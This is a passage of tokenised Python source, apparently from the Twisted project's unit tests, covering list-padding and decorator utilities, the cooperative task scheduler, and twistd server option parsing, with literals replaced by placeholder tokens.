<EOL> def test_padNonEmptyList ( self ) : <EOL> """<STR_LIT>""" <EOL> padded = util . padTo ( <NUM_LIT:3> , [ <NUM_LIT:1> , <NUM_LIT:2> ] , "<STR_LIT:z>" ) <EOL> self . assertEqual ( [ <NUM_LIT:1> , <NUM_LIT:2> , "<STR_LIT:z>" ] , padded ) <EOL> def test_padToSmallerSize ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( ValueError , util . padTo , <NUM_LIT:1> , [ <NUM_LIT:1> , <NUM_LIT:2> ] ) <EOL> def test_alreadyPadded ( self ) : <EOL> """<STR_LIT>""" <EOL> items = [ <NUM_LIT:1> , <NUM_LIT:2> ] <EOL> padded = util . padTo ( len ( items ) , items ) <EOL> self . assertEqual ( items , padded ) <EOL> def test_alreadyPaddedCopies ( self ) : <EOL> """<STR_LIT>""" <EOL> items = [ <NUM_LIT:1> , <NUM_LIT:2> ] <EOL> padded = util . padTo ( len ( items ) , items ) <EOL> self . assertIsNot ( padded , items ) <EOL> def test_makeCopy ( self ) : <EOL> """<STR_LIT>""" <EOL> items = [ ] <EOL> util . padTo ( <NUM_LIT:4> , items ) <EOL> self . assertEqual ( [ ] , items ) <EOL> class ReplaceIfTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_replacesIfTrue ( self ) : <EOL> """<STR_LIT>""" <EOL> @ util . _replaceIf ( True , lambda : "<STR_LIT>" ) <EOL> def test ( ) : <EOL> return "<STR_LIT>" <EOL> self . assertEqual ( test ( ) , "<STR_LIT>" ) <EOL> self . assertEqual ( test . __name__ , "<STR_LIT:test>" ) <EOL> self . assertEqual ( test . __module__ , "<STR_LIT>" ) <EOL> def test_keepsIfFalse ( self ) : <EOL> """<STR_LIT>""" <EOL> @ util . _replaceIf ( False , lambda : "<STR_LIT>" ) <EOL> def test ( ) : <EOL> return "<STR_LIT>" <EOL> self . assertEqual ( test ( ) , "<STR_LIT>" ) <EOL> def test_multipleReplace ( self ) : <EOL> """<STR_LIT>""" <EOL> @ util . _replaceIf ( True , lambda : "<STR_LIT>" ) <EOL> @ util . _replaceIf ( False , lambda : "<STR_LIT:bar>" ) <EOL> @ util . _replaceIf ( True , lambda : "<STR_LIT>" ) <EOL> def test ( ) : <EOL> return "<STR_LIT>" <EOL> self . assertEqual ( test ( ) , "<STR_LIT>" ) <EOL> def test_boolsOnly ( self ) : <EOL> """<STR_LIT>""" <EOL> with self . assertRaises ( ValueError ) as e : <EOL> @ util . _replaceIf ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> def test ( ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( e . exception . args [ <NUM_LIT:0> ] , <EOL> ( "<STR_LIT>" <EOL> "<STR_LIT>" ) ) </s>
<s> """<STR_LIT>""" </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division , absolute_import <EOL> from twisted . internet import reactor , defer , task <EOL> from twisted . trial import unittest <EOL> class FakeDelayedCall ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , func ) : <EOL> """<STR_LIT>""" <EOL> self . func = func <EOL> self . cancelled = False <EOL> def cancel ( self ) : <EOL> """<STR_LIT>""" <EOL> self . cancelled = True <EOL> class FakeScheduler ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> self . work = [ ] <EOL> def __call__ ( self , thunk ) : <EOL> """<STR_LIT>""" <EOL> unit = FakeDelayedCall ( thunk ) <EOL> self . work . append ( unit ) <EOL> return unit <EOL> def pump ( self ) : <EOL> """<STR_LIT>""" <EOL> work , self . work = self . work , [ ] <EOL> for unit in work : <EOL> if not unit . cancelled : <EOL> unit . func ( ) <EOL> class CooperatorTests ( unittest . TestCase ) : <EOL> RESULT = '<STR_LIT>' <EOL> def ebIter ( self , err ) : <EOL> err . trap ( task . SchedulerStopped ) <EOL> return self . RESULT <EOL> def cbIter ( self , ign ) : <EOL> self . fail ( ) <EOL> def testStoppedRejectsNewTasks ( self ) : <EOL> """<STR_LIT>""" <EOL> def testwith ( stuff ) : <EOL> c = task . Cooperator ( ) <EOL> c . stop ( ) <EOL> d = c . coiterate ( iter ( ( ) ) , stuff ) <EOL> d . addCallback ( self . cbIter ) <EOL> d . addErrback ( self . ebIter ) <EOL> return d . addCallback ( lambda result : <EOL> self . assertEqual ( result , self . RESULT ) ) <EOL> return testwith ( None ) . addCallback ( lambda ign : testwith ( defer . Deferred ( ) ) ) <EOL> def testStopRunning ( self ) : <EOL> """<STR_LIT>""" <EOL> c = task . Cooperator ( ) <EOL> def myiter ( ) : <EOL> for myiter . value in range ( <NUM_LIT:3> ) : <EOL> yield myiter . value <EOL> myiter . value = - <NUM_LIT:1> <EOL> d = c . coiterate ( myiter ( ) ) <EOL> d . addCallback ( self . cbIter ) <EOL> d . addErrback ( self . ebIter ) <EOL> c . stop ( ) <EOL> def doasserts ( result ) : <EOL> self . assertEqual ( result , self . RESULT ) <EOL> self . assertEqual ( myiter . value , - <NUM_LIT:1> ) <EOL> d . addCallback ( doasserts ) <EOL> return d <EOL> def testStopOutstanding ( self ) : <EOL> """<STR_LIT>""" <EOL> testControlD = defer . Deferred ( ) <EOL> outstandingD = defer . Deferred ( ) <EOL> def myiter ( ) : <EOL> reactor . callLater ( <NUM_LIT:0> , testControlD . callback , None ) <EOL> yield outstandingD <EOL> self . fail ( ) <EOL> c = task . Cooperator ( ) <EOL> d = c . coiterate ( myiter ( ) ) <EOL> def stopAndGo ( ign ) : <EOL> c . stop ( ) <EOL> outstandingD . callback ( '<STR_LIT>' ) <EOL> testControlD . addCallback ( stopAndGo ) <EOL> d . addCallback ( self . cbIter ) <EOL> d . addErrback ( self . ebIter ) <EOL> return d . addCallback ( <EOL> lambda result : self . assertEqual ( result , self . RESULT ) ) <EOL> def testUnexpectedError ( self ) : <EOL> c = task . Cooperator ( ) <EOL> def myiter ( ) : <EOL> if <NUM_LIT:0> : <EOL> yield None <EOL> else : <EOL> raise RuntimeError ( ) <EOL> d = c . coiterate ( myiter ( ) ) <EOL> return self . assertFailure ( d , RuntimeError ) <EOL> def testUnexpectedErrorActuallyLater ( self ) : <EOL> def myiter ( ) : <EOL> D = defer . Deferred ( ) <EOL> reactor . callLater ( <NUM_LIT:0> , D . errback , RuntimeError ( ) ) <EOL> yield D <EOL> c = task . Cooperator ( ) <EOL> d = c . coiterate ( myiter ( ) ) <EOL> return self . assertFailure ( d , RuntimeError ) <EOL> def testUnexpectedErrorNotActuallyLater ( self ) : <EOL> def myiter ( ) : <EOL> yield defer . fail ( RuntimeError ( ) ) <EOL> c = task . Cooperator ( ) <EOL> d = c . coiterate ( myiter ( ) ) <EOL> return self . assertFailure ( d , RuntimeError ) <EOL> def testCooperation ( self ) : <EOL> L = [ ] <EOL> def myiter ( things ) : <EOL> for th in things : <EOL> L . append ( th ) <EOL> yield None <EOL> groupsOfThings = [ '<STR_LIT:abc>' , ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) , '<STR_LIT>' , ( <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> ) ] <EOL> c = task . Cooperator ( ) <EOL> tasks = [ ] <EOL> for stuff in groupsOfThings : <EOL> tasks . append ( c . coiterate ( myiter ( stuff ) ) ) <EOL> return defer . DeferredList ( tasks ) . addCallback ( <EOL> lambda ign : self . assertEqual ( tuple ( L ) , sum ( zip ( * groupsOfThings ) , ( ) ) ) ) <EOL> def testResourceExhaustion ( self ) : <EOL> output = [ ] <EOL> def myiter ( ) : <EOL> for i in range ( <NUM_LIT:100> ) : <EOL> output . append ( i ) <EOL> if i == <NUM_LIT:9> : <EOL> _TPF . stopped = True <EOL> yield i <EOL> class _TPF : <EOL> stopped = False <EOL> def __call__ ( self ) : <EOL> return self . stopped <EOL> c = task . Cooperator ( terminationPredicateFactory = _TPF ) <EOL> c . coiterate ( myiter ( ) ) . addErrback ( self . ebIter ) <EOL> c . _delayedCall . cancel ( ) <EOL> c . _tick ( ) <EOL> c . stop ( ) <EOL> self . assertTrue ( _TPF . stopped ) <EOL> self . assertEqual ( output , list ( range ( <NUM_LIT:10> ) ) ) <EOL> def testCallbackReCoiterate ( self ) : <EOL> """<STR_LIT>""" <EOL> calls = [ ] <EOL> class FakeCall : <EOL> def __init__ ( self , func ) : <EOL> self . func = func <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . func , ) <EOL> def sched ( f ) : <EOL> self . assertFalse ( calls , repr ( calls ) ) <EOL> calls . append ( FakeCall ( f ) ) <EOL> return calls [ - <NUM_LIT:1> ] <EOL> c = task . Cooperator ( scheduler = sched , terminationPredicateFactory = lambda : lambda : True ) <EOL> d = c . coiterate ( iter ( ( ) ) ) <EOL> done = [ ] <EOL> def anotherTask ( ign ) : <EOL> c . coiterate ( iter ( ( ) ) ) . addBoth ( done . append ) <EOL> d . addCallback ( anotherTask ) <EOL> work = <NUM_LIT:0> <EOL> while not done : <EOL> work += <NUM_LIT:1> <EOL> while calls : <EOL> calls . pop ( <NUM_LIT:0> ) . func ( ) <EOL> work += <NUM_LIT:1> <EOL> if work > <NUM_LIT:50> : <EOL> self . fail ( "<STR_LIT>" ) <EOL> def test_removingLastTaskStopsScheduledCall ( self ) : <EOL> """<STR_LIT>""" <EOL> calls = [ None ] <EOL> def sched ( f ) : <EOL> calls [ <NUM_LIT:0> ] = FakeDelayedCall ( f ) <EOL> return calls [ <NUM_LIT:0> ] <EOL> coop = task . Cooperator ( scheduler = sched ) <EOL> task1 = coop . cooperate ( iter ( [ <NUM_LIT:1> , <NUM_LIT:2> ] ) ) <EOL> task2 = coop . cooperate ( iter ( [ <NUM_LIT:1> , <NUM_LIT:2> ] ) ) <EOL> self . assertEqual ( calls [ <NUM_LIT:0> ] . func , coop . _tick ) <EOL> task1 . stop ( ) <EOL> self . assertEqual ( calls [ <NUM_LIT:0> ] . cancelled , False ) <EOL> self . assertEqual ( coop . _delayedCall , calls [ <NUM_LIT:0> ] ) <EOL> task2 . stop ( ) <EOL> self . assertEqual ( calls [ <NUM_LIT:0> ] . cancelled , True ) <EOL> self . assertEqual ( coop . _delayedCall , None ) <EOL> coop . cooperate ( iter ( [ <NUM_LIT:1> , <NUM_LIT:2> ] ) ) <EOL> self . assertEqual ( calls [ <NUM_LIT:0> ] . cancelled , False ) <EOL> self . assertEqual ( coop . _delayedCall , calls [ <NUM_LIT:0> ] ) <EOL> def test_runningWhenStarted ( self ) : <EOL> """<STR_LIT>""" <EOL> c = task . Cooperator ( ) <EOL> self . assertTrue ( c . running ) <EOL> def test_runningWhenNotStarted ( self ) : <EOL> """<STR_LIT>""" <EOL> c = task . Cooperator ( started = False ) <EOL> self . assertFalse ( c . running ) <EOL> def test_runningWhenRunning ( self ) : <EOL> """<STR_LIT>""" <EOL> c = task . Cooperator ( started = False ) <EOL> c . start ( ) <EOL> self . addCleanup ( c . stop ) <EOL> self . assertTrue ( c . running ) <EOL> def test_runningWhenStopped ( self ) : <EOL> """<STR_LIT>""" <EOL> c = task . Cooperator ( started = False ) <EOL> c . start ( ) <EOL> c . stop ( ) <EOL> self . assertFalse ( c . running ) <EOL> class UnhandledException ( Exception ) : <EOL> """<STR_LIT>""" <EOL> class AliasTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_cooperate ( self ) : <EOL> """<STR_LIT>""" <EOL> d = defer . Deferred ( ) <EOL> def doit ( ) : <EOL> yield <NUM_LIT:1> <EOL> yield <NUM_LIT:2> <EOL> yield <NUM_LIT:3> <EOL> d . callback ( "<STR_LIT>" ) <EOL> it = doit ( ) <EOL> theTask = task . cooperate ( it ) <EOL> self . assertIn ( theTask , task . _theCooperator . _tasks ) <EOL> return d <EOL> class RunStateTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _doDeferNext = False <EOL> self . _doStopNext = False <EOL> self . _doDieNext = False <EOL> self . work = [ ] <EOL> self . scheduler = FakeScheduler ( ) <EOL> self . cooperator = task . Cooperator ( <EOL> scheduler = self . scheduler , <EOL> terminationPredicateFactory = lambda : lambda : True ) <EOL> self . task = self . cooperator . cooperate ( self . worker ( ) ) <EOL> self . cooperator . start ( ) <EOL> def worker ( self ) : <EOL> """<STR_LIT>""" <EOL> i = <NUM_LIT:0> <EOL> while True : <EOL> i += <NUM_LIT:1> <EOL> if self . _doDeferNext : <EOL> self . _doDeferNext = False <EOL> d = defer . Deferred ( ) <EOL> self . work . append ( d ) <EOL> yield d <EOL> elif self . _doStopNext : <EOL> return <EOL> elif self . _doDieNext : <EOL> raise UnhandledException ( ) <EOL> else : <EOL> self . work . append ( i ) <EOL> yield i <EOL> def tearDown ( self ) : <EOL> """<STR_LIT>""" <EOL> del self . task <EOL> del self . scheduler <EOL> def deferNext ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _doDeferNext = True <EOL> def stopNext ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _doStopNext = True <EOL> def dieNext ( self ) : <EOL> """<STR_LIT>""" <EOL> def ignoreUnhandled ( failure ) : <EOL> failure . trap ( UnhandledException ) <EOL> return None <EOL> self . _doDieNext = True <EOL> def test_pauseResume ( self ) : <EOL> """<STR_LIT>""" <EOL> self . scheduler . pump ( ) <EOL> self . assertEqual ( self . work , [ <NUM_LIT:1> ] ) <EOL> self . scheduler . pump ( ) <EOL> self . assertEqual ( self . work , [ <NUM_LIT:1> , <NUM_LIT:2> ] ) <EOL> self . task . pause ( ) <EOL> self . scheduler . pump ( ) <EOL> self . assertEqual ( self . work , [ <NUM_LIT:1> , <NUM_LIT:2> ] ) <EOL> self . task . resume ( ) <EOL> self . assertEqual ( self . work , [ <NUM_LIT:1> , <NUM_LIT:2> ] ) <EOL> self . scheduler . pump ( ) <EOL> self . assertEqual ( self . work , [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) <EOL> def test_resumeNotPaused ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( task . NotPaused , self . task . resume ) <EOL> self . task . pause ( ) <EOL> self . task . resume ( ) <EOL> self . assertRaises ( task . NotPaused , self . task . resume ) <EOL> def test_pauseTwice ( self ) : <EOL> """<STR_LIT>""" <EOL> self . task . pause ( ) <EOL> self . scheduler . pump ( ) <EOL> self . assertEqual ( self . work , [ ] ) <EOL> self . task . pause ( ) <EOL> self . scheduler . pump ( ) <EOL> self . assertEqual ( self . work , [ ] ) <EOL> self . task . resume ( ) <EOL> self . scheduler . pump ( ) <EOL> self . assertEqual ( self . work , [ ] ) <EOL> self . task . resume ( ) <EOL> self . scheduler . pump ( ) <EOL> self . assertEqual ( self . work , [ <NUM_LIT:1> ] ) <EOL> def test_pauseWhileDeferred ( self ) : <EOL> """<STR_LIT>""" <EOL> self . deferNext ( ) <EOL> self . scheduler . pump ( ) <EOL> self . assertEqual ( len ( self . work ) , <NUM_LIT:1> ) <EOL> self . assertTrue ( isinstance ( self . work [ <NUM_LIT:0> ] , defer . Deferred ) ) <EOL> self . scheduler . pump ( ) <EOL> self . assertEqual ( len ( self . work ) , <NUM_LIT:1> ) <EOL> self . task . pause ( ) <EOL> self . scheduler . pump ( ) <EOL> self . assertEqual ( len ( self . work ) , <NUM_LIT:1> ) <EOL> self . task . resume ( ) <EOL> self . scheduler . pump ( ) <EOL> self . assertEqual ( len ( self . work ) , <NUM_LIT:1> ) <EOL> self . work [ <NUM_LIT:0> ] . callback ( "<STR_LIT>" ) <EOL> self . scheduler . pump ( ) <EOL> self . assertEqual ( len ( self . work ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( self . work [ <NUM_LIT:1> ] , <NUM_LIT:2> ) <EOL> def test_whenDone ( self ) : <EOL> """<STR_LIT>""" <EOL> deferred1 = self . task . whenDone ( ) <EOL> deferred2 = self . task . whenDone ( ) <EOL> results1 = [ ] <EOL> results2 = [ ] <EOL> final1 = [ ] <EOL> final2 = [ ] <EOL> def callbackOne ( result ) : <EOL> results1 . append ( result ) <EOL> return <NUM_LIT:1> <EOL> def callbackTwo ( result ) : <EOL> results2 . append ( result ) <EOL> return <NUM_LIT:2> <EOL> deferred1 . addCallback ( callbackOne ) <EOL> deferred2 . addCallback ( callbackTwo ) <EOL> deferred1 . addCallback ( final1 . append ) <EOL> deferred2 . addCallback ( final2 . append ) <EOL> self . stopNext ( ) <EOL> self . scheduler . pump ( ) <EOL> self . assertEqual ( len ( results1 ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( results2 ) , <NUM_LIT:1> ) <EOL> self . assertIdentical ( results1 [ <NUM_LIT:0> ] , self . task . _iterator ) <EOL> self . assertIdentical ( results2 [ <NUM_LIT:0> ] , self . task . _iterator ) <EOL> self . assertEqual ( final1 , [ <NUM_LIT:1> ] ) <EOL> self . assertEqual ( final2 , [ <NUM_LIT:2> ] ) <EOL> def test_whenDoneError ( self ) : <EOL> """<STR_LIT>""" <EOL> deferred1 = self . task . whenDone ( ) <EOL> results = [ ] <EOL> deferred1 . addErrback ( results . append ) <EOL> self . dieNext ( ) <EOL> self . scheduler . pump ( ) <EOL> self . assertEqual ( len ( results ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( results [ <NUM_LIT:0> ] . check ( UnhandledException ) , UnhandledException ) <EOL> def test_whenDoneStop ( self ) : <EOL> """<STR_LIT>""" <EOL> deferred1 = self . task . whenDone ( ) <EOL> errors = [ ] <EOL> deferred1 . addErrback ( errors . append ) <EOL> self . task . stop ( ) <EOL> self . assertEqual ( len ( errors ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( errors [ <NUM_LIT:0> ] . check ( task . TaskStopped ) , task . TaskStopped ) <EOL> def test_whenDoneAlreadyDone ( self ) : <EOL> """<STR_LIT>""" <EOL> self . stopNext ( ) <EOL> self . scheduler . pump ( ) <EOL> results = [ ] <EOL> self . task . whenDone ( ) . addCallback ( results . append ) <EOL> self . assertEqual ( results , [ self . task . _iterator ] ) <EOL> def test_stopStops ( self ) : <EOL> """<STR_LIT>""" <EOL> self . task . stop ( ) <EOL> self . scheduler . pump ( ) <EOL> self . assertEqual ( len ( self . work ) , <NUM_LIT:0> ) <EOL> self . assertRaises ( task . TaskStopped , self . task . stop ) <EOL> self . assertRaises ( task . TaskStopped , self . task . pause ) <EOL> self . scheduler . pump ( ) <EOL> self . assertEqual ( self . work , [ ] ) <EOL> def test_pauseStopResume ( self ) : <EOL> """<STR_LIT>""" <EOL> self . task . pause ( ) <EOL> self . task . stop ( ) <EOL> self . task . resume ( ) <EOL> self . scheduler . pump ( ) <EOL> self . assertEqual ( self . work , [ ] ) <EOL> def test_stopDeferred ( self ) : <EOL> """<STR_LIT>""" <EOL> self . deferNext ( ) <EOL> self . scheduler . pump ( ) <EOL> d = self . work . pop ( ) <EOL> self . assertEqual ( self . task . _pauseCount , <NUM_LIT:1> ) <EOL> results = [ ] <EOL> d . addBoth ( results . append ) <EOL> self . scheduler . pump ( ) <EOL> self . task . stop ( ) <EOL> self . scheduler . pump ( ) <EOL> d . callback ( <NUM_LIT:7> ) <EOL> self . scheduler . pump ( ) <EOL> self . assertEqual ( results , [ None ] ) <EOL> self . assertEqual ( self . work , [ ] ) <EOL> def test_stopExhausted ( self ) : <EOL> """<STR_LIT>""" <EOL> self . stopNext ( ) <EOL> self . scheduler . pump ( ) <EOL> self . assertRaises ( task . TaskDone , self . task . stop ) <EOL> def test_stopErrored ( self ) : <EOL> """<STR_LIT>""" <EOL> self . dieNext ( ) <EOL> self . scheduler . pump ( ) <EOL> self . assertRaises ( task . TaskFailed , self . task . stop ) <EOL> def test_stopCooperatorReentrancy ( self ) : <EOL> """<STR_LIT>""" <EOL> callbackPhases = [ ] <EOL> def stopit ( result ) : <EOL> callbackPhases . append ( result ) <EOL> self . cooperator . stop ( ) <EOL> callbackPhases . append ( "<STR_LIT>" ) <EOL> self . task . whenDone ( ) . addCallback ( stopit ) <EOL> self . stopNext ( ) <EOL> self . scheduler . pump ( ) <EOL> self . assertEqual ( callbackPhases , [ self . task . _iterator , "<STR_LIT>" ] ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import , division <EOL> import errno <EOL> import inspect <EOL> import signal <EOL> import os <EOL> import sys <EOL> try : <EOL> import pwd <EOL> import grp <EOL> except ImportError : <EOL> pwd = grp = None <EOL> try : <EOL> import cPickle as pickle <EOL> except ImportError : <EOL> import pickle <EOL> from zope . interface import implementer <EOL> from zope . interface . verify import verifyObject <EOL> from twisted . trial import unittest <EOL> from twisted . test . test_process import MockOS <EOL> from twisted import plugin , logger <EOL> from twisted . application . service import IServiceMaker <EOL> from twisted . application import service , app , reactors <EOL> from twisted . scripts import twistd <EOL> from twisted . python . compat import NativeStringIO <EOL> from twisted . python . usage import UsageError <EOL> from twisted . python . log import ( ILogObserver as LegacyILogObserver , <EOL> textFromEventDict ) <EOL> from twisted . python . components import Componentized <EOL> from twisted . internet . defer import Deferred <EOL> from twisted . internet . interfaces import IReactorDaemonize <EOL> from twisted . internet . test . modulehelpers import AlternateReactor <EOL> from twisted . python . fakepwd import UserDatabase <EOL> from twisted . logger import globalLogBeginner , globalLogPublisher , ILogObserver <EOL> try : <EOL> from twisted . scripts import _twistd_unix <EOL> except ImportError : <EOL> _twistd_unix = None <EOL> else : <EOL> from twisted . scripts . _twistd_unix import UnixApplicationRunner <EOL> from twisted . scripts . _twistd_unix import UnixAppLogger <EOL> try : <EOL> from twisted . python import syslog <EOL> except ImportError : <EOL> syslog = None <EOL> try : <EOL> import profile <EOL> except ImportError : <EOL> profile = None <EOL> try : <EOL> import pstats <EOL> import cProfile <EOL> except ImportError : <EOL> cProfile = None <EOL> if getattr ( os , '<STR_LIT>' , None ) is None : <EOL> setuidSkip = "<STR_LIT>" <EOL> else : <EOL> setuidSkip = None <EOL> def patchUserDatabase ( patch , user , uid , group , gid ) : <EOL> """<STR_LIT>""" <EOL> pwent = pwd . getpwuid ( os . getuid ( ) ) <EOL> grent = grp . getgrgid ( os . getgid ( ) ) <EOL> database = UserDatabase ( ) <EOL> database . addUser ( <EOL> user , pwent . pw_passwd , uid , pwent . pw_gid , <EOL> pwent . pw_gecos , pwent . pw_dir , pwent . pw_shell ) <EOL> def getgrnam ( name ) : <EOL> result = list ( grent ) <EOL> result [ result . index ( grent . gr_name ) ] = group <EOL> result [ result . index ( grent . gr_gid ) ] = gid <EOL> result = tuple ( result ) <EOL> return { group : result } [ name ] <EOL> patch ( pwd , "<STR_LIT>" , database . getpwnam ) <EOL> patch ( grp , "<STR_LIT>" , getgrnam ) <EOL> class MockServiceMaker ( object ) : <EOL> """<STR_LIT>""" <EOL> tapname = '<STR_LIT>' <EOL> def makeService ( self , options ) : <EOL> """<STR_LIT>""" <EOL> self . options = options <EOL> self . service = service . Service ( ) <EOL> return self . service <EOL> class CrippledAppLogger ( app . AppLogger ) : <EOL> """<STR_LIT>""" <EOL> def start ( self , application ) : <EOL> pass <EOL> class CrippledApplicationRunner ( twistd . _SomeApplicationRunner ) : <EOL> """<STR_LIT>""" <EOL> loggerFactory = CrippledAppLogger <EOL> def preApplication ( self ) : <EOL> pass <EOL> def postApplication ( self ) : <EOL> pass <EOL> class ServerOptionsTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_subCommands ( self ) : <EOL> """<STR_LIT>""" <EOL> class FakePlugin ( object ) : <EOL> def __init__ ( self , name ) : <EOL> self . tapname = name <EOL> self . _options = '<STR_LIT>' + name <EOL> self . description = '<STR_LIT>' + name <EOL> def options ( self ) : <EOL> return self . _options <EOL> apple = FakePlugin ( '<STR_LIT>' ) <EOL> banana = FakePlugin ( '<STR_LIT>' ) <EOL> coconut = FakePlugin ( '<STR_LIT>' ) <EOL> donut = FakePlugin ( '<STR_LIT>' ) <EOL> def getPlugins ( interface ) : <EOL> self . assertEqual ( interface , IServiceMaker ) <EOL> yield coconut <EOL> yield banana <EOL> yield donut <EOL> yield apple <EOL> config = twistd . ServerOptions ( ) <EOL> self . assertEqual ( config . _getPlugins , plugin . getPlugins ) <EOL> config . _getPlugins = getPlugins <EOL> subCommands = config . subCommands <EOL> expectedOrder = [ apple , banana , coconut , donut ] <EOL> for subCommand , expectedCommand in zip ( subCommands , expectedOrder ) : <EOL> name , shortcut , parserClass , documentation = subCommand <EOL> self . assertEqual ( name , expectedCommand . tapname ) <EOL> self . assertEqual ( shortcut , None ) <EOL> self . assertEqual ( parserClass ( ) , expectedCommand . _options ) , <EOL> self . assertEqual ( documentation , expectedCommand . description ) <EOL> def test_sortedReactorHelp ( self ) : <EOL> """<STR_LIT>""" <EOL> class FakeReactorInstaller ( object ) : <EOL> def __init__ ( self , name ) : <EOL> self . shortName = '<STR_LIT>' + name <EOL> self . description = '<STR_LIT>' + name <EOL> apple = FakeReactorInstaller ( '<STR_LIT>' ) <EOL> banana = FakeReactorInstaller ( '<STR_LIT>' ) <EOL> coconut = FakeReactorInstaller ( '<STR_LIT>' ) <EOL> donut = FakeReactorInstaller ( '<STR_LIT>' ) <EOL> def getReactorTypes ( ) : <EOL> yield coconut <EOL> yield banana <EOL> yield donut <EOL> yield apple <EOL> config = twistd . ServerOptions ( ) <EOL> self . assertEqual ( config . _getReactorTypes , reactors . getReactorTypes ) <EOL> config . _getReactorTypes = getReactorTypes <EOL> config . messageOutput = NativeStringIO ( ) <EOL> self . assertRaises ( SystemExit , config . parseOptions , [ '<STR_LIT>' ] ) <EOL> helpOutput = config . messageOutput . getvalue ( ) <EOL> indexes = [ ] <EOL> for reactor in apple , banana , coconut , donut : <EOL> def getIndex ( s ) : <EOL> self . assertIn ( s , helpOutput ) <EOL> indexes . append ( helpOutput . index ( s ) ) <EOL> getIndex ( reactor . shortName ) <EOL> getIndex ( reactor . description ) <EOL> self . assertEqual ( <EOL> indexes , sorted ( indexes ) , <EOL> '<STR_LIT>' % ( <EOL> helpOutput , ) ) <EOL> def test_postOptionsSubCommandCausesNoSave ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> config . subCommand = '<STR_LIT>' <EOL> config . postOptions ( ) <EOL> self . assertEqual ( config [ '<STR_LIT>' ] , True ) <EOL> def test_postOptionsNoSubCommandSavesAsUsual ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> config . postOptions ( ) <EOL> self . assertEqual ( config [ '<STR_LIT>' ] , False ) <EOL> def test_listAllProfilers ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> helpOutput = str ( config ) <EOL> for profiler in app . AppProfiler . profilers : <EOL> self . assertIn ( profiler , helpOutput ) <EOL> def test_defaultUmask ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> self . assertEqual ( config [ '<STR_LIT>' ] , None ) <EOL> def test_umask ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> config . parseOptions ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( config [ '<STR_LIT>' ] , <NUM_LIT> ) <EOL> config . parseOptions ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( config [ '<STR_LIT>' ] , <NUM_LIT> ) <EOL> def test_invalidUmask ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> self . assertRaises ( UsageError , config . parseOptions , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> if _twistd_unix is None : <EOL> msg = "<STR_LIT>" <EOL> test_defaultUmask . skip = test_umask . skip = test_invalidUmask . skip = msg <EOL> def test_unimportableConfiguredLogObserver ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> e = self . assertRaises ( <EOL> UsageError , config . parseOptions , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertTrue ( <EOL> e . args [ <NUM_LIT:0> ] . startswith ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> self . assertNotIn ( '<STR_LIT:\n>' , e . args [ <NUM_LIT:0> ] ) <EOL> def test_badAttributeWithConfiguredLogObserver ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> e = self . assertRaises ( UsageError , config . parseOptions , <EOL> [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> if sys . version_info <= ( <NUM_LIT:3> , <NUM_LIT:5> ) : <EOL> self . assertTrue ( <EOL> e . args [ <NUM_LIT:0> ] . startswith ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> else : <EOL> self . assertTrue ( <EOL> e . args [ <NUM_LIT:0> ] . startswith ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> self . assertNotIn ( '<STR_LIT:\n>' , e . args [ <NUM_LIT:0> ] ) <EOL> class TapFileTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> self . tapfile = self . mktemp ( ) <EOL> with open ( self . tapfile , '<STR_LIT:wb>' ) as f : <EOL> pickle . dump ( service . Application ( "<STR_LIT>" ) , f ) <EOL> def test_createOrGetApplicationWithTapFile ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> config . parseOptions ( [ '<STR_LIT>' , self . tapfile ] ) <EOL> application = CrippledApplicationRunner ( <EOL> config ) . createOrGetApplication ( ) <EOL> self . assertEqual ( service . IService ( application ) . name , '<STR_LIT>' ) <EOL> class TestLoggerFactory ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , runner ) : 